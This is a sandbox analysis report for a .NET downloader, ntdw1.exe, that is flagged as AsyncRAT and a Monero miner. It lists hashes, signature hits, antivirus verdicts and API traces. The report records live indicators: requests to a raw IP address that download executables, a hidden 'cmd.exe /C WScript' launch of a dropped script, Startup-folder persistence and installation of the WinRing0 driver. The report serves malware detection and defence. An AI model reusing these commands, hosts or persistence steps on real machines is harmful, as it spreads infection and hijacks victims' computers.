popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ntdw1.exe

AsyncRAT Cryptocurrency_miner Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 24, 2021, 6 p.m. April 24, 2021, 6:05 p.m.
Size 11.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 2cf6144870e0ba1a5290316435125321
SHA256 59efa7f3af975532fe4da3d5653933fddb06fffa847190bc967c9c0ebfe10741
CRC32 3DC89665
ssdeep 192:A29BE9u+1nTN+qs9sdmXkC7iQIW1YPhzuHv9E/vhEJ0CT+lNK:3iu+d4qs9z0C7i9hzuHv9EXh4T+lN
PDB Path C:\Users\JOHN\source\repos\WindowsApp1\WindowsApp1\obj\Debug\WindowsApp1.pdb
Yara
  • PE_Header_Zero - PE File Signature Zero
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • IsPE32 - (no description)
  • IsNET_EXE - (no description)
  • IsWindowsGUI - (no description)
  • HasDebugData - DebugData Check

Name Response Post-Analysis Lookup
pool.supportxmr.com
A 91.121.140.167
A 94.23.247.226
CNAME pool-fr.supportxmr.com
A 37.187.95.110
A 94.23.23.52
A 149.202.83.171
94.23.23.52
IP Address Status Action
149.202.83.171 Active Moloch
164.124.101.2 Active Moloch
45.144.225.135 Active Moloch

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
pdb_path C:\Users\JOHN\source\repos\WindowsApp1\WindowsApp1\obj\Debug\WindowsApp1.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.144.225.135/csrss.exe
suspicious_features Connection to IP address suspicious_request GET http://45.144.225.135/config.txt
suspicious_features Connection to IP address suspicious_request GET http://45.144.225.135/notepad.exe
request GET http://45.144.225.135/csrss.exe
request GET http://45.144.225.135/config.txt
request GET http://45.144.225.135/notepad.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00870000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72741000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72742000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a40000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00522000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00546000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0052a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0054a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00547000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2256
region_size: 1916928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03820000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2112
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000380000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2112
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002340000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2112
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ae0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2112
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002db0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a52000
process_handle: 0xffffffff
1 0 0
description Tempbds.exe tried to sleep 222 seconds, actually delayed analysis time by 222 seconds
file C:\Users\test22\AppData\Local\Tempbds.exe
cmdline cmd.exe /C WScript "C:\ProgramData\LKBNMTFJgl\r.vbs"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 1292
thread_handle: 0x00000284
process_identifier: 1240
current_directory:
filepath:
track: 1
command_line: cmd.exe /C WScript "C:\ProgramData\LKBNMTFJgl\r.vbs"
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000280
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000000c8
process_name: pw.exe
process_identifier: 1552
1 1 0

Process32NextW

 snapshot_handle: 0x000000c8
process_name: 珊
process_identifier: 6761664
0 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: notepad.exe
process_identifier: 2112
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: taskhost.exe
process_identifier: 1296
1 1 0

Process32NextW

 snapshot_handle: 0x00000288
process_name: cmd.exe
process_identifier: 1240
1 1 0

Process32NextW

 snapshot_handle: 0x00000288
process_name: inject-x86.exe
process_identifier: 2312
1 1 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: cmd.exe
process_identifier: 1444
1 1 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: conhost.exe
process_identifier: 2800
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@Àº´ Í!¸LÍ!This program cannot be run in DOS mode. $2°ëvх,vх,vх,õ͋,wх,Ό,lх,ŸÎˆ,wх,Richvх,PEL3ô~`à 0 °¸+@ @ð³,¤' (Ð °0 (.textp$ 0  `.data$Š@ @ @À.rsrc°Ð P @@¼ç¨^MSVBVM60.DLL
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000284
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000280
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000280
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000230
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000214
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000214
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000214
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000214
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000214
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000214
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000214
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000214
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000250
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000250
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000250
process_name: taskhost.exe
process_identifier: 1296
0 0

Process32NextW

 snapshot_handle: 0x00000250
process_name: taskhost.exe
process_identifier: 1296
0 0
host 45.144.225.135
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
Time & API Arguments Status Return Repeated

CreateServiceW

 service_start_name:
start_type: 3
password:
display_name: WinRing0_1_2_0
filepath: C:\Windows\WinRing0x64.sys
service_name: WinRing0_1_2_0
filepath_r: C:\Windows\WinRing0x64.sys
desired_access: 983551
service_handle: 0x0000000000be7c80
error_control: 1
service_type: 1
service_manager_handle: 0x0000000000be7ad0
1 12483712 0
file C:\Windows\SysWOW64\wscript.exe
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
McAfee RDN/Generic Downloader.x
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan-Downloader ( 005798a51 )
Alibaba Trojan:Win32/Miner.d6f21ee3
K7GW Trojan-Downloader ( 005798a51 )
CrowdStrike win/malicious_confidence_70% (W)
Arcabit Trojan.Generic.D23109E6
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/TrojanDownloader.Small.CLG
APEX Malicious
Paloalto generic.ml
Kaspersky Trojan.Win32.Miner.auuln
BitDefender Trojan.GenericKD.36768230
NANO-Antivirus Trojan.Win32.Miner.iuhoru
ViRobot Trojan.Win32.Z.Downloader.11264.A
MicroWorld-eScan Trojan.GenericKD.36768230
Avast Win32:Trojan-gen
Ad-Aware Trojan.GenericKD.36768230
Emsisoft Trojan-Downloader.Small (A)
DrWeb Trojan.Siggen12.56619
Zillya Trojan.Miner.Win32.12523
McAfee-GW-Edition RDN/Generic Downloader.x
FireEye Generic.mg.2cf6144870e0ba1a
Sophos Mal/Generic-S
Ikarus Win32.Outbreak
Avira TR/Downloader.Gen
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Trojan.Win32.Downloader.sa
Microsoft Backdoor:Win32/Bladabindi!ml
AegisLab Trojan.Win32.Miner.4!c
ZoneAlarm Trojan.Win32.Miner.auuln
GData Win32.Trojan-Downloader.Generic.M2KAVL
AhnLab-V3 Trojan/Win.Generic.C4387213
VBA32 TScope.Trojan.MSIL
MAX malware (ai score=100)
Malwarebytes Malware.AI.1417145416
TrendMicro-HouseCall TrojanSpy.Win32.MALXMR.USMANDK21
Rising Downloader.Small!8.B41 (CLOUD)
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_86%
Fortinet Riskware/Miner
AVG Win32:Trojan-gen
Cybereason malicious.f7bcbe
Panda Trj/Downloader.FUM